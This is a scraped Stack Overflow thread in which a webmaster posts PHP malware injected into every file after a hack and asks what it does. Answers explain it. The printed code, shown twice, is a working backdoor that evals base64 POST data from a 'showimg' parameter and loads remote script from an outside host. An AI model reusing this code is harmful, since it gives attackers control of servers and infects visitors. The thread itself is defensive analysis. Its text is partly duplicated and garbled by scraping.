javascript - Got Hacked - Anyone know what this PHP Code Does? - Stack Overflow

admin管理员组

文章数量:1366232

Our server got hacked via some SQL Injection method (now patched). All our PHP files got this added to the very top of each file.

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

It seems to set a cookie but I don't have the first idea what it does.

Any experts able to understand what this does and potentially what the Cookie Name that is created may look like so I can tell any users etc

UPDATE Seen the exploit was due to a plugin in the Zenphoto Gallery Software called Tiny_MCE.

Our server got hacked via some SQL Injection method (now patched). All our PHP files got this added to the very top of each file.

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }

It seems to set a cookie but I don't have the first idea what it does.

Any experts able to understand what this does and potentially what the Cookie Name that is created may look like so I can tell any users etc

UPDATE Seen the exploit was due to a plugin in the Zenphoto Gallery Software called Tiny_MCE.

• javascript
• php
• cookies

Share Improve this question Follow edited Aug 31, 2014 at 0:06 AstroCB 12.4k2020 gold badges5959 silver badges7474 bronze badges asked Nov 9, 2011 at 17:18 DarkUFODarkUFO 69211 gold badge99 silver badges2323 bronze badges 3

• why it was tagged with sql injection? – Your Common Sense Commented Nov 10, 2011 at 7:01
• 4 What I'm curious about is how SQL injection gained an attacker filesystem access.... – user212218 Commented Nov 10, 2011 at 13:03
• Had the same thing just now, and I decided to do a plete restore instead of digging around in a squillion files. It added cookie scripts to any .php file, and the whole thing lurks in htaccess, as Dave says. It redirects, and will at some point get your site blacklisted. Not so nice. Good luck all. – benteh Commented Nov 10, 2011 at 14:05

Add a ment  | 

2 Answers 2

Sorted by: Reset to default 10

First it sets a cookie. (named lb11) to the value 102.

If it (later?) finds the cookie, it sets the cookie to a random value between 1000 and 9000, so that it doesn't do this again: Has the user request (and execute) a javascript, which sends which which infected URL made the call, and then refresh the page, (so nothing appears to have happened after the javascript has run.

But in any case, if the "showimg" parameter is passed to the page, it looks at the content of that page, and executes it on the server.

So, If this code is present, it will run javascript, (which also informs the server which URL is infected, and then let the person run arbitrary code (via the showimg parameter) on the infected server.

This has 2 layers of attacks, it can attack the client with javascript, and can later attack the server and run arbitrary code on it.

I could be wrong here, but from the looks of it (without testing the links in the code); it could be trying to inject some client-side javascript which could be malicious. This would usually infect the visitors puter with malware etc.

As for the cookie name. I would get your visitors to remove all cookies for your domain, but from the looks of it, the cookie is called "lb11"

I didn't fancy looking at the links as you can understand ;)

本文标签： javascriptGot HackedAnyone know what this PHP Code DoesStack Overflow